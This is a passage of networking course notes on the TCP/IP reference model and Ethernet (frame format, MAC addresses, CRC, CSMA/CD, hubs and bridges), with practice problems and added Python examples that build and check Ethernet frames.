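            "payload_fraction": len(message) / total}


if __name__ == "__main__":
    msg = b"x" * 1000                                      # constructed 1000-byte message
    print(wire_stats(msg))
    print(receive(send(msg, b"\x0a\x00\x00\x01", b"\x0a\x00\x00\x02"), b"\x0a\x00\x00\x02") == msg)
```

wire_stats does the same bookkeeping that the framing practice problems ask for (header bytes accumulate on the way down, and the data link layer's frame limit decides how many frames result), while receive shows that a corrupted frame is dropped at the data link layer and that the transport checksum catches anything the link did not.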
Practice Problem 11.1
Suppose an application entity generates 1024 bytes of data. By the time this data arrives at the data link layer, 96 bytes of
header information has been added. At the data link layer, the maximum frame size is 256 bytes, 32 bytes of which are its
header. How many frames will be used? How many total bytes must be transmitted?
Solution:
III. The TCP/IP Reference Model
The model we used in Section II was not chosen randomly! This model, repeated below, is termed the TCP/IP reference model.
You should memorize this model! Use a mnemonic if it helps. One possibility is the West Point motto: Please Do Not Trash
Army.
1. A Five Layer Model. The model we will use is the TCP/IP reference model, which consists of five layers. We list the
layer, then describe some of the functions usually assigned to the layer.
The application layer
The application layer is concerned with general purpose facilities that involve communications:
 SMTP for email
 HTTP for accessing the web
 FTP for file transfer
 SSH and TELNET for remote log in
 DNS for directory assistance
 SNMP for network management
Several other functions are also conceptually placed at the application layer:
 Encoding. For example: Are we using EBCDIC or ASCII? Are we using Big Endian or Little Endian?
 Encryption
 Compression
Blocks of data at the application layer are termed messages.
The application layer uses end-to-end protocols that do not recognize the existence of an underlying network. The notion of a
networking protocol being end-to-end can be somewhat confusing, so it may be helpful to recast the notion in terms of a
different network you are familiar with: the telephone network.
Suppose you (in Annapolis) are having a phone conversation with your friend (in Florida) over the plain-old-telephone system.
Suppose you use some acronyms in your conversation. Instead of saying, United States Naval Academy you say USNA. Instead
of saying Midshipmen Regulations Manual you say MIDREGS. Instead of saying Brigade Medical Unit, you say BMU.
Instead of saying Greatest Bestest Course Ehvur you say Cyber-2. Using acronyms is a form of data compression. You are
conveying the exact same information to your friend, but you are doing this with fewer syllables.
Now, ask yourself: Does the Phone Company—the wires, the switching stations, the fiber optic cables—care if you are using
acronyms to compress your data? The answer is, of course: No. The phone company does not care, and is not even aware, of
the use of compression in your voice conversation. It only matters to the end users who are actually speaking on the telephone.
Now, let's switch back to computer networks. We mentioned that the application layer can implement compression. As with
phones, so with computers: only the end points will care, or even be aware of the fact that data is being compressed. The
underlying computer network is oblivious to this.
Consider another example: Encoding. Encoding is done at the application layer, and an encoding protocol is end-to-end: the
network is not aware of the encoding scheme. In a telephone conversation, the encoding scheme might be the language that
you and your friend converse in. The phone company's network does not care if your conversation is in English or Spanish;
this is a concern only to the end users.
So, again, the application layer protocols are end-to-end.
The transport layer
Ideally, the transport layer is responsible for the end-to-end transfer of data from a process in the source to a process at the
destination, independent of the network. Put another way, ideally the transport layer uses end-to-end protocols that do not
recognize the existence of an underlying network.
Blocks of data at the transport layer are termed segments.
Some tasks of the transport layer:
 End-to-end flow control
 End-to-end error control
 End-to-end congestion control[19]
 Multiplexing- sending several transport layer connections over a single network layer connection.
The phone company analogy is useful again for recognizing that the protocols at the transport layer are end-to-end. Does the
phone company's network care if the person on the receiving end says: "Slow down, I'm trying to write this down" (Flow
control)? Does the phone company's network care if the person on the receiving end says: "Let me read this back to you to
make sure I've got it" (Error control)? The answers: No and No; these are end-to-end concerns.
[19] The ideal separation of layers breaks down in practice. Although congestion control algorithms are end-to-end algorithms,
they are designed to alleviate congestion in a network.
In the next three layers, the protocols are between adjacent entities (machine-router, router-router, router-machine).
The network layer
The network layer is concerned with transferring data across a communications network from a source computer to a destination
computer. This is the first layer that recognizes the existence of a network.
Blocks of data at the network layer are termed packets or datagrams. Tasks for the network layer include:
 Routing
 Internetworking-interconnecting distinct networks that use different protocols (different addressing schemes, different
packet sizes, etc.)
The data link layer
The data link layer is concerned with transferring data across a single link connecting two nodes.
Blocks of data at the data link layer are termed frames. Tasks for the data link layer include:
 Setting frame boundaries
 Error control (to make a real link into an error-free link)
 Link flow control (to stop a fast transmitter from drowning a slow receiver)
 Control access to shared channels-the Multiple Access Problem
The physical layer
The physical layer is concerned with sending bits over a channel: i.e., the mechanical and electrical considerations. Blocks of
data at the physical layer are termed bits… so we're not really talking about blocks!
2. The Big Picture Again
 In each layer, a process on one computer communicates with a peer process on another computer using that layer's
protocol. This communication is virtual.
 The layer n + 1 entity uses the services provided by layer n. Layer n + 1 only cares that layer n performs the desired
service. How layer n goes about performing the service (i.e., the implementation) is of no interest to layer n + 1.
 The layer n protocol does not interpret the information passed to it by layer n + 1.
 At the sending end, each layer puts a header on the message received from the layer above. The header contains
information necessary for the protocol to do its job. At the receiving end, each layer strips off the corresponding
header and forwards the rest up to the layer above. For example, the picture below focuses on the network layer, and
we can see that a segment from the transport layer (in gray) is encapsulated into a packet at the network layer (by
adding the header shown in pink). This packet is then sent to the data link layer.
Source: Forouzan, Data Communications and Networking, 4th ed., McGraw Hill, 2007
The process will continue. The packet at the network layer will be encapsulated into a frame at the data link layer.
See PowerPoint slide "Layers" on the course website.
As we discuss the security issues in the TCP/IP Model, we must keep in mind that networks must remain useful. All ITSD
network security problems at the Naval Academy could be instantly solved by simply preventing all midshipman, faculty and
staff from using computers and computer networks! That is not a good solution. We want to be able to use our networks, but
in a safe and secure manner.
Practice Problem 11.2
You caught one of your crewmembers attempting to gamble online on one of your ship's computers. After putting him on
report, he tells you that the computer did not seem to be working. For each of the network problems below, state which layer
of the TCP/IP model the problem resides in.
(a)
Our computer cannot communicate with a website due to an error in the routing algorithm used by an intermediate node.
(b)
Our computer cannot communicate with a website because your crewmember spilled his drink on the cable adapter,
causing a short.
(c)
Our computer cannot communicate with a website due to the fact that the two users (us and them) are using different
end-to-end error control algorithms.
(d)
Our computer cannot communicate with a website because we are using the XYZ-encryption algorithm, but the website
server is using the (incompatible) ABC-decryption algorithm.
Solution:
(a)
(b)
(c)
(d)
Practice Problem 11.3
For the boxes below, fill in the names of the layers for the TCP/IP - 5 layer reference model and then place the appropriate
letter in the blank associated with the layer for the proper description of its services.
Layer 5
_____
______
Layer 4
_____
______
Layer 3
_____
______
Layer 2
_____
______
Layer 1
_____
______
a) Provides a definition of mechanical and electrical standards for communication system
b) Concerned with transferring packets across a communication network
c) Responsible for end to end transfer of data
d) Primary function is to format and transfer files between communication message and the user’s software
e) Frames of data are transferred across a single link
Solution:
Problems
1.
The basic unit of information sent at the application layer is termed a message. Write down the term that is used to denote
the basic unit of information sent at each of the layers listed below:
(a) transport layer
(b) network layer
(c) data link layer
(d) physical layer
2.
What is the name used for the data unit that is encapsulated within a data link frame?
3.
What is the name for the data unit that is decapsulated from a packet?
4.
A program wants to send 100 bytes of data. The application layer adds a ten byte header (resulting in a 110-byte message).
Suppose every succeeding layer also appends a ten byte header. When the resulting bits are eventually transmitted
out of the physical layer, what percentage of these bits corresponds to the program's data?
5.
State the layer of the TCP/IP reference model that is responsible for each of the following tasks:
(a) Determining the route from source to destination
(b) Handling a frame received from an adjacent computer
(c) Detecting end-to-end errors
(d) Transmitting +5 volts to denote logical 1 and -5 volts to denote logical 0
6.
(a)
Suppose an application entity sends an L-byte message to its peer entity. The layers in the TCP/IP model
add a total of 58 bytes of overhead (header and trailer). What percentage of the physical layer bits
corresponds to the application message if L = 100 bytes?
(b)
Repeat part (a) for L = 1000 bytes.
7.
List the layers of the TCP/IP model and select from the list below the letter that best describes the main function of
each layer.
(a) Transfers frames across a single link connecting two nodes
(b) Responsible for end-to-end flow, error, and congestion control
(c) Sends bits over a channel
(d) Processes that provide services to users such as HTTP and FTP
(e) Responsible for routing packets and internetworking
Chapter 12: Ethernet
Objectives:
(a) Define the structure of an Ethernet address.
(b) State the minimum and maximum size of an Ethernet frame.
(c) Calculate the bandwidth available to users in various network configurations.
(d) Distinguish between the capabilities and uses of a hub, a bridge and a switch.
I. Ethernet
1. Introduction. In the late 1960's and into the early 1970's, computers were stand-alone devices. A computer at, say,
Stanford, had no way of communicating with a computer at, say, the Naval Academy. Research teams (largely funded by the
DoD) began to explore methods for linking computers together, allowing them to transmit information back and forth.
A breakthrough occurred when Robert Metcalfe proposed a technique for joining computers together. At heart, the computers
were joined together by a wire allowing bits to flow between computers. The sketch below (from Metcalfe's 1976 conference
paper) shows four computers (in red) joined together by a wire (in yellow). (Note that one of the four computers is drawn to
be larger than the other three in order to show some internal details).
Metcalfe, an Electrical Engineer, called his proposal "Ethernet." His company, Xerox (yes, Xerox, the same company that said
"No Thank-you" to the first computer with a GUI that it had developed in-house three years before Apple, and the same
company that saw no future in the first computer mouse that it had developed in-house) was not interested in doing anything
with the Ethernet proposal, so Metcalfe formed his own company in 1979 and named it 3Com. 3Com went on to sell hundreds
of millions of Ethernet adapter cards as a Fortune 500 Company (3Com was purchased by HP in 2009). Network World
reported that by 2010, approximately $16 billion in Ethernet equipment had been sold per year.[20]
You may be wondering: Just run a wire between the computers?…there's got to be more to it than that! There are indeed four
considerations.
 First, if one computer sends data to another, there has to be a mechanism to allow the intended recipient to know
where the block of data begins and ends. In other words, the recipient must be able to look at the collection of received
bits—called a frame—and determine where the frame begins and ends. This is called the framing problem.
 Second, in order to send a frame to a specific device, every device will need a unique address. This is the address
problem.
 Third, the receiver should be able to determine if the received frame has errors. This is called the error-control
problem.
 Fourth, we have to consider the possibility that more than one computer may place their frame on the wire at the same
time. This will cause the electrical signals to collide, and both frames will be destroyed. This is called the multiple
access problem.
Metcalfe's breakthrough proposal—Ethernet—handles these four issues. Other competing proposals to join computers together
into a local area network (Token Ring, Token Bus, ATM, FDDI) have since fizzled and died, leaving Ethernet as the only game
in town for wired local area networks.
The original Ethernet transmitted at a bit rate of 10 mega-bits per second (Mbps). In 1995, a 100 Mbps Ethernet standard was
introduced, dubbed Fast Ethernet. This was followed in 1998 by Gigabit Ethernet (with a data rate of 1 Gbps) and in 2002
[20] In 1996, Steve Jobs stated that "Xerox could have owned the entire computer industry today."
by a 10 Gbps standard (10-Gigabit Ethernet). A 100 Gbps Ethernet standard was recently approved (2010), but commercial
products have not yet reached the market.
Note that we are dealing exclusively with transmitting frame data over a single link. Stated another way and with reference to the
TCP/IP reference model: we are dealing with data link-layer concerns. Additionally, note that Ethernet is implemented in a
computer's Network Interface Card (NIC).
2. Ethernet's Solution to the Framing Problem. All Ethernet variants (10 Mbps, 100 Mbps, 1 Gbps and 10 Gbps) use the
same data link frame format, shown below.
Figure 13.4: 802.3 MAC frame. Source: Forouzan, Data Communications and Networking, McGraw Hill, 2007
The fields are:
 Preamble: The preamble is not formally part of the Ethernet frame. It is added by the physical layer. It consists of
the byte 10101010 repeated 7 times. The preamble allows the receiver to synchronize to the beginning of the
frame.
 Start Frame Delimiter (SFD): The SFD is not formally part of the Ethernet frame. It is added by the physical layer.
It is the single byte: 10101011. Notice that the start frame delimiter follows the same pattern of alternating ones
and zeroes as the preamble, except that it concludes with two consecutive 1's. These two consecutive 1's indicate that
synchronization is over, and the real stuff is about to start: the next item will be the destination address.
 The Destination and the Source Ethernet Addresses: Much more on this to follow!
 Length or Type: This field usually specifies the kind of data the frame carries (e.g.: Is the data an IP packet?). In
rare implementations, this field is used instead to serve as a Length Field, providing the number of bytes in the data
field.
 Data and padding: This holds the data that was received from the network layer. The minimum size of the "Data
and Padding" field must be 46 bytes, and the maximum size of this field is 1500 bytes.
 CRC: Cyclic Redundancy Code used for error detection. More on this below.
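The field list above can be turned directly into code. What follows is an added example written for these notes (not code from the EC310 materials or from any NIC driver): a Python builder and parser for the frame format just described. It pads short payloads up to the 46-byte minimum, rejects payloads over 1500 bytes, computes the CRC-32 over everything from the destination address through the padding, and on the receiving side throws away any frame whose CRC does not match, which is exactly what an Ethernet receiver does with a damaged frame. The MAC addresses and payload are constructed sample values; the Type value 0x0800 is the real one for an IP packet.

```python
import struct
import zlib

# Physical-layer bytes that precede the frame; not counted in the frame size.
PREAMBLE = b"\xaa" * 7            # 10101010 repeated seven times
SFD = b"\xab"                     # 10101011: two consecutive 1's end synchronization

ETH_HDR = struct.Struct("!6s6sH")  # destination MAC, source MAC, Length/Type
MIN_DATA, MAX_DATA = 46, 1500      # "Data and padding" field limits from the notes
FCS_LEN = 4                        # CRC-32 trailer
MIN_FRAME = ETH_HDR.size + MIN_DATA + FCS_LEN   # 14 + 46 + 4 = 64 bytes
MAX_FRAME = ETH_HDR.size + MAX_DATA + FCS_LEN   # 14 + 1500 + 4 = 1518 bytes
ETHERTYPE_IPV4 = 0x0800            # Type value meaning "the data is an IP packet"


def mac_to_bytes(text: str) -> bytes:
    """'00:11:22:33:44:55' -> six raw bytes."""
    parts = text.split(":")
    if len(parts) != 6:
        raise ValueError("an Ethernet address has exactly six bytes")
    return bytes(int(p, 16) for p in parts)


def bytes_to_mac(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def build_frame(dst: str, src: str, ethertype: int, payload: bytes) -> bytes:
    """Sender side: header + data (padded to 46 bytes) + CRC-32 over all of it."""
    if len(payload) > MAX_DATA:
        raise ValueError("payload exceeds the 1500-byte maximum")
    data = payload.ljust(MIN_DATA, b"\x00")          # padding, if the payload is short
    body = ETH_HDR.pack(mac_to_bytes(dst), mac_to_bytes(src), ethertype) + data
    # zlib.crc32 uses the same CRC-32 polynomial as IEEE 802.3; it is packed
    # least-significant byte first here, the order the reflected CRC goes on the wire.
    return body + struct.pack("<I", zlib.crc32(body))


def parse_frame(frame: bytes):
    """Receiver side: reject runts and giants, discard on CRC failure, else split fields."""
    if not MIN_FRAME <= len(frame) <= MAX_FRAME:
        raise ValueError("frame size outside 64..1518 bytes")
    body, fcs = frame[:-FCS_LEN], struct.unpack("<I", frame[-FCS_LEN:])[0]
    if zlib.crc32(body) != fcs:
        return None                                   # single bit in error: whole frame dropped
    dst, src, ethertype = ETH_HDR.unpack_from(body)
    return {"dst": bytes_to_mac(dst), "src": bytes_to_mac(src),
            "type": ethertype, "data": body[ETH_HDR.size:]}


def on_the_wire(frame: bytes) -> bytes:
    """What the physical layer actually sends: preamble and SFD, then the frame."""
    return PREAMBLE + SFD + frame


if __name__ == "__main__":
    # Constructed sample: broadcast destination, made-up source, 5-byte payload.
    f = build_frame("ff:ff:ff:ff:ff:ff", "00:11:22:33:44:55", ETHERTYPE_IPV4, b"hello")
    print(len(f), parse_frame(f))
```

Two things the code makes visible that the prose only implies: the 5-byte payload comes back as 46 bytes because the frame carries no field saying how much of "Data and padding" is real data (the network layer's own header has to say that, which is one reason Type rather than Length is the usual use of that field), and a frame shorter than 64 bytes or longer than 1518 is rejected before its CRC is even checked.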
Practice Problem 12.1
What is the minimum size of an Ethernet frame? (Do not include the physical layer header in your calculation.)
Solution:
Practice Problem 12.2
What is the maximum size of an Ethernet frame? (Do not include the physical layer header in your calculation.)
Solution:
Practice Problem 12.3
Why would padding ever be used in the field marked Data and padding?
Solution:
So, Ethernet frames must be at least 64 bytes and are not permitted to exceed 1518 bytes. Which raises the question: Why
these size limitations?
The maximum Ethernet frame size is easy to appreciate. We limit the maximum frame to 1518 bytes for three reasons:
 To prevent a single user from hogging the network. Recall the picture on page 271 that shows four users sending their
data over the same wire. Suppose you are one of those users, and you want to send a frame. With Ethernet, a user
who wants to transmit a frame first listens on the wire to make sure no one else is already transmitting. If someone
else is already transmitting, then it would make no sense for you to transmit at the same time: You would garble the
transmission in progress, and your transmission would also garble. So, you patiently wait for the wire to go idle before
you transmit. Since Ethernet users always politely wait for the shared wire to go idle before transmitting, a greedy
user who starts transmitting could keep transmitting forever, never allowing others an opportunity to transmit their
frames. To avoid this, a user is allowed to transmit at most 1518 bytes before they must stop and give other users an
opportunity to transmit their frames.
 Error control. With Ethernet, if a single bit arrives in error, the entire frame is thrown away by the receiver. Since
each bit represents an opportunity for error, the fewer bits we have, the fewer opportunities for error we have.
 Historical reasons. Data that arrives at the NIC must be buffered before it is sent to main memory. Although memory
is very cheap today, memory was very expensive in the 1970s and 1980s when the Ethernet standard was developed.
The minimum Ethernet frame size—64 bytes—is based on technical considerations that are far less intuitive. We mentioned
that when a host using Ethernet wants to transmit a frame, it first listens to see if anyone else is transmitting. Only if a host
senses that the medium is "quiet" does it proceed with the transmission of its frame.
But even if a host takes care to ensure that the medium is quiet, collisions can still occur! For example, suppose two hosts want
to transmit an Ethernet frame at the same time and both first listen to ensure the medium is not in use. Both stations will detect
that the medium is not in use and both will start transmitting! These sorts of collisions are unavoidable.
Since collisions are unavoidable, we want to ensure that a user can tell if his transmission was involved in a collision. When
Ethernet users start transmitting, they continue to listen to the channel to detect a collision. It is important for a user to know
if his frame was involved in a collision since any frames involved in collisions will need to be retransmitted. Thus, we need to
ensure that User-1 is still transmitting under the condition that the furthest away station (say, User-2) listens to the channel just
before User-1's frame arrives, senses it idle and starts transmitting also.
Based on the maximum allowed separation between users and the speed of light (more precisely: the speed of propagation in
the cable), it can be shown (we skip the derivation) that if the minimum frame size is set to 64 bytes (512 bits) a user will be
able to tell if it was his frame that was involved in a collision.
An Aside
Ethernet users share access to the channel. For that reason, Ethernet is termed a Multiple Access (MA) scheme.
In addition, Ethernet users listen to (i.e., sense) the channel before transmitting. This way they do not start transmitting their frame while another frame transmission from some other user is already in progress. For that reason, Ethernet is termed a Channel Sense Multiple Access (CSMA) scheme.[21]
Finally, even after an Ethernet user starts transmitting, she continues to sense the channel for collisions. Collisions can occur if two users sense the channel idle at the same time and start transmitting. When a host detects that her frame is colliding, she immediately stops transmitting (what's the point of continuing to transmit a frame if we already know it's garbled?). For this reason, Ethernet is termed a Channel Sense Multiple Access with Collision Detection (CSMA/CD) scheme.
[21] Since a signal in this context is carrying our data, it is referred to as a carrier signal; when we sense the channel we are sensing to detect the presence or absence of the carrier signal. Thus, CSMA is most often called Carrier Sense Multiple Access.
3. Ethernet's Solution to the Address Problem
Each Network Interface Card (NIC) is assigned a globally unique address—an Ethernet address—that is burned into the card's
Read Only Memory (ROM). ROM is non-volatile memory whose contents cannot be altered by the user. All machines on an
Ethernet LAN are guaranteed to have unique addresses. Moreover, no two hosts anywhere in the world have the same Ethernet
address.
So, when you buy a NIC (or, as is most often the case, a computer that contains a NIC), you are also buying a globally unique
Ethernet address that only you possess.
Ethernet Addresses are 6 bytes. It is important to realize that Ethernet addresses are also commonly referred to as physical
addresses, hardware addresses and Medium Access Control (MAC) addresses—these terms are all synonyms!
Practice Problem 12.4
(a) How many bits are in an Ethernet address?
(b) How many hexadecimal digits are needed to express an Ethernet address?
Solution: (a)
(b)
Ethernet addresses are usually expressed in hexadecimal notation (sometimes with colons between the bytes). For example,
an Ethernet address might be 06:01:03:02:2A:3D.
Practice Problem 12.5
Two of these 48 bits in an Ethernet address are used for special purposes. Disregarding these two bits, how many possible
Ethernet addresses exist?
Solution:
Practice Problem 12.6
If there are 7 billion people in the world, and we disperse Ethernet addresses uniformly, how many addresses are available for
each person?
Solution:
You should be convinced that we are in no danger of "running out" of Ethernet addresses!
The uniqueness of Ethernet addresses is assured by the fact that the first 3 bytes of the address are assigned to a given
manufacturer (or vendor), and this vendor must use these three bytes as the first three bytes in every NIC that the vendor
manufactures. (The Institute of Electrical and Electronics Engineers—IEEE—is the group that actually does this
assignment). For instance, all NICs manufactured by 3COM have Ethernet addresses starting with 02608C, all NICs
manufactured by Cisco have Ethernet addresses starting with 00000C, etc.
Practice Problem 12.7
How many possible Ethernet addresses exist for each individual vendor?
Solution:
Sometimes, a host may want to transmit a frame to every other user on the Ethernet LAN. A special address is reserved for
this purpose. A host may send a frame to everyone by sending the frame to the broadcast address, which is the address
consisting of all ones; i.e., a string of 48 consecutive 1’s.
Practice Problem 12.8
Express the Ethernet broadcast address in hexadecimal.
Solution:
Referring back to the Ethernet picture on page 271, any frame transmitted by any user arrives at the NIC of all other directly
connected users! Stated another way, the NIC receives all frames that are sent on the wire. But it only forwards some of the
frames up to the host's network layer.
Specifically, the NIC only forwards to the network layer:
• Frames addressed to its own unique address. When a frame arrives at the NIC, the NIC checks the frame to see the destination address. If the destination address of the frame matches its NIC address, then the NIC "realizes" that this data is intended for itself, and passes the frame to the network layer. If the destination address in the frame does not match its NIC address, the frame is discarded.
• Frames addressed to the broadcast address. As mentioned, a frame sent to the broadcast address (48 ones) will be accepted by every NIC.
• All frames, if the NIC is placed in "promiscuous" mode. A vulnerability of Ethernet is the ease with which an Ethernet card can be programmed to accept all frames, even frames addressed to other users. So, any user who sets their NIC to promiscuous mode can examine the traffic sent by all other users.
4. Ethernet's Solution to the Error Control Problem
Recall from the picture of the Ethernet frame shown on page 272 that the last four bytes are used for the Cyclic Redundancy
Code (CRC). The CRC is used for error detection. Ethernet can only detect errors; it cannot correct errors. If a frame arrives
with errors, it is simply discarded. (Higher-layer protocols may later recognize the loss of data and take action to remedy the
problem, such as by requesting retransmission. Ethernet, though, simply discards frames containing errors without giving the
matter a second thought.)
An Aside
Ethernet's CRC algorithm hinges on a special number that mathematicians have devised. This number, given the name CRC-32, is special because it almost never divides evenly into other numbers, i.e., it almost always leaves a remainder when it is divided into another number. When the NIC crafts a frame to transmit, it fills the four byte CRC field with the specific bits that will make the total frame (including the CRC field) perfectly divisible (with no remainder) by CRC-32.
When this frame is received by the destination, the destination NIC divides the received frame by CRC-32. If the frame arrives
without errors, the result of the division will be zero and the frame will be accepted. If any bits were flipped en-route from
source to destination the resulting division will leave a remainder and the frame will be discarded.
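As an added example (not from the notes), here is a small Python model of the frame layout and receive rules described above: it builds the frame from Problem 6 (Alice 11:22:33:44:55:66 to Bob AA:BB:CC:DD:EE:FF, "Hello World" padded to 46 bytes), computes the CRC-32 FCS with zlib.crc32 (the same polynomial Ethernet uses), shows how a receiving NIC discards a frame with a flipped bit, and applies the own-address / broadcast / promiscuous acceptance rule from section 3. The function names and the residue constant check are this example's own, not part of the notes.

```python
import zlib

# Field sizes from the frame layout in the notes (preamble and SFD are physical-layer
# additions and are left out, as in Practice Problems 12.1 and 12.2).
ADDR_LEN = 6
HEADER_LEN = ADDR_LEN + ADDR_LEN + 2    # destination, source, length/type
MIN_PAYLOAD = 46                        # "Data and padding" is padded up to 46 bytes
MAX_PAYLOAD = 1500                      # and may not exceed 1500 bytes
FCS_LEN = 4                             # CRC-32 at the end of the frame
MIN_FRAME = HEADER_LEN + MIN_PAYLOAD + FCS_LEN    # 64 bytes
MAX_FRAME = HEADER_LEN + MAX_PAYLOAD + FCS_LEN    # 1518 bytes
BROADCAST = "FF:FF:FF:FF:FF:FF"                   # 48 one-bits
# CRC-32 starts its register at 0xFFFFFFFF and inverts the result, so the aside's
# "zero remainder" appears as this fixed constant when the FCS is included in the division.
CRC32_RESIDUE = 0x2144DF1C


def parse_mac(text):
    """'AA:BB:CC:DD:EE:FF' (or 'AA-BB-...' or 'AABBCCDDEEFF') -> 6 raw bytes."""
    raw = bytes.fromhex(text.replace(":", "").replace("-", ""))
    if len(raw) != ADDR_LEN:
        raise ValueError("an Ethernet address is exactly 6 bytes (48 bits)")
    return raw


def format_mac(raw):
    """6 raw bytes -> 'AA:BB:CC:DD:EE:FF'."""
    return ":".join(f"{b:02X}" for b in raw)


def build_frame(dst, src, payload, length_or_type=None):
    """Sender side: header + data (zero-padded to 46 bytes) + CRC-32 FCS, as put on the wire."""
    if len(payload) > MAX_PAYLOAD:
        raise ValueError(f"{len(payload)} data bytes exceed the 1500-byte maximum")
    if length_or_type is None:
        length_or_type = len(payload)       # field used as a Length field, as in Problem 6
    data = payload + bytes(max(0, MIN_PAYLOAD - len(payload)))   # all-zero padding
    body = parse_mac(dst) + parse_mac(src) + length_or_type.to_bytes(2, "big") + data
    fcs = zlib.crc32(body) & 0xFFFFFFFF     # same generator polynomial as the Ethernet FCS
    return body + fcs.to_bytes(FCS_LEN, "little")


def check_frame(frame):
    """Receiver side: enforce the size limits and the CRC. Returns (ok, fields); fields is None on failure."""
    if not MIN_FRAME <= len(frame) <= MAX_FRAME:
        return False, None
    body, fcs = frame[:-FCS_LEN], frame[-FCS_LEN:]
    if zlib.crc32(body) & 0xFFFFFFFF != int.from_bytes(fcs, "little"):
        return False, None                  # any flipped bit: discard, no correction attempted
    length_or_type = int.from_bytes(body[12:14], "big")
    data = body[HEADER_LEN:]
    # Used as a Length field (<= 1500): strip the padding. Used as a Type field: hand up all of it.
    payload = data[:length_or_type] if length_or_type <= MAX_PAYLOAD else data
    return True, {"dst": format_mac(body[0:6]), "src": format_mac(body[6:12]),
                  "length_or_type": length_or_type, "payload": payload}


def fcs_residue_ok(frame):
    """The aside's view: divide the whole frame (FCS included) and look only at the remainder."""
    return (zlib.crc32(frame) & 0xFFFFFFFF) == CRC32_RESIDUE


def nic_accepts(frame, my_mac, promiscuous=False):
    """Which frames a NIC passes up to the network layer: its own address, the broadcast
    address, or everything when in promiscuous mode (the sniffing risk the notes describe)."""
    if promiscuous:
        return True
    dst = format_mac(frame[0:ADDR_LEN])
    return dst == format_mac(parse_mac(my_mac)) or dst == BROADCAST
```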
5. Ethernet's Solution to the Multiple Access Problem
We have already outlined the mechanism by which Ethernet users share a channel. They listen first before transmitting (so as
not to collide with the transmissions of other users).
Suppose we have 4 users on a 10 Mbps Ethernet. The 4 users share the 10 Mbps capacity of the network. If all 4 users have a
lot to say, then each user will, on average, get to use the network ¼ of the time. As a rough approximation, we can say that
each of the 4 users will get to send at 2.5 Mbps. From each user’s perspective, they are on a 2.5 Mbps network, not a 10 Mbps
network.
Make sure you are clear on why things work this way: In Ethernet, users might share a medium, and any user’s transmission
will prevent all others on that same shared medium from transmitting. When one of the four users in our scenario above
transmit, the other three users will be prevented from transmitting because they will first sense the channel and will not
intentionally collide with another user.
We say that the four users in this example share a “collision domain.” If users have the ability to collide with each other, they
are in the same collision domain.
As a back-of-the-envelope calculation, we can say that the bandwidth[22] available to a user is given by:
BW per user = (Total BW available in the collision domain) / (Number of users sharing the collision domain)
[22] In networking, the term bandwidth has two meanings. One meaning of bandwidth is data rate, measured in bits per second. That is the meaning which we use in this chapter. Later in this course (in the Wireless Module) we will encounter the other meaning of the term bandwidth.
Figure 13.15 A network with and without a bridge
Practice Problem 12.9
What is the bandwidth available to each of the users on the 10 Mbps Ethernet shown below?
Solution:
Practice Problem 12.10
What is the bandwidth available to each of the users on the 10 Mbps Ethernet shown below?
Solution:
II. Connecting Users on an Ethernet LAN
1. Hubs
Ethernet first used a bus topology with heavy garden-hose size coaxial cable. In a bus topology, all users are connected in a straight-line configuration, as in the example on the prior page. Later, the communication medium transitioned to unshielded twisted pair (UTP), which was ubiquitous in most office buildings. Most buildings were set up such that UTP wires terminated in a central electrical cabinet that served as a hub. Here, the term hub was simply meant as a "center of activity," the way the term is still used as in "Denver is a hub for United Airlines." The picture below illustrates this idea.
[Figure 1.10, from Forouzan, Data Communications and Networking, McGraw Hill, 2007: an isolated LAN connecting 12 computers to a hub in an electrical closet]
Now, devices called Ethernet hubs are used to connect the twisted pairs from each host together.
[Figure: an Ethernet hub]
Using the hub pictured above, we can connect four hosts together simply by plugging each host's NIC into one of the hub's four
ports.
When using a hub, we can consider the hosts to be, for practical purposes, electrically soldered together at the hub. Frames
that arrive at one port are sent out on all other ports. A frame arriving on one port is not buffered or stored—it is simply
transmitted out on all of the other ports. Fault isolation is easy with hubs—we merely have to unplug the problem host. Adding
and removing hosts is also easy—we just plug in new users and unplug hosts that we want to remove from the LAN.
It is important to note that a hub is a physical layer device. It only recognizes the existence of bits. When bits arrive on one
port, they are sent out on all of the remaining ports. A hub does not understand that some bits that arrive are Ethernet addresses
and some bits that arrive are CRC, and so forth. To a hub, everything is just bits.
Practice Problem 12.11
Consider the 10 Mbps Ethernet shared by the busy users in the network below. The network uses three 4-port hubs. How
much bandwidth is available to each user?
Figure 13.15 A network with and without a bridge
Solution:
2. Separating Collision Domains with Bridges
A bridge is similar to a hub in that it can be used to connect multiple hosts or multiple LANs. The distinction is that a bridge
will only transmit what has to be sent to the other LAN, whereas the hub will send all information.
To make this distinction clear, consider the picture below, which shows two Ethernet LANs joined together by a bridge.
[Figure: two Ethernet LANs joined by a bridge, with hosts labeled 1 to 6 and 9 to 14]
Suppose Host 3 wants to send a frame to Host 5. Host 3 sends the frame out on the left LAN and it arrives at all users on that LAN, including the bridge. The bridge will inspect the frame, and see that it is destined for Host 5. The bridge knows that Host 5 is on the left LAN and must have already received the frame (since everyone on the left LAN received the frame). The important point: the bridge will not forward the frame to the right-side LAN since the bridge knows that Host 5 is not on the right-side LAN.
A bridge can be used to connect two or more Ethernet LANs like a hub, but, unlike a hub, a bridge can divide up the hosts into separate collision domains. When a frame arrives, the bridge looks at the source and destination Ethernet addresses. The bridge then decides whether the frame should be forwarded (and if so, to which outgoing port). Since a bridge looks at and understands data link addresses, it operates at the data link layer (Layer 2). A bridge is said to be a "Layer-2 connecting device."
[Figure 13.15: A network with and without a bridge]
The main advantage of bridges over hubs is improved performance. We may want to split a single heavily loaded LAN into separate LANs to improve performance by limiting collisions and forwarding only when we have to. Bridges have a few ancillary advantages. Bridges enhance reliability, since a single bad user (outputting continuously) will not disable all hosts; if bridges are used, the bad user will only kill his segment. Additionally, bridges can be used to enhance security, since we can isolate portions of the network and only forward frames where they must go.
Practice Problem 12.12
Consider users employing 10 Mbps Ethernet. How much bandwidth does each user get in each of the three scenarios below.
(a) Scenario 1:
(b) Scenario 2:
(c) Scenario 3:
Solution:
(a)
(b)
(c)
We should note that the results of the preceding calculations are, at best, approximations. We are presuming that a bridge port
provides as much traffic on a LAN as a typical user. For example, in the picture above, consider the top-left collision domain.
This collision domain has three users, plus the bridge port. The bridge port, however, is conveying the traffic from nine other
users (the users on the other three LANs), so it may not be the case that the bridge port contributes the same amount of traffic
in this collision domain as the other three users. Nevertheless, since bridges are often used to separate users who do not
communicate very often, assuming a bridge port acts as a typical user often yields satisfactory results.
3. Switched Ethernet
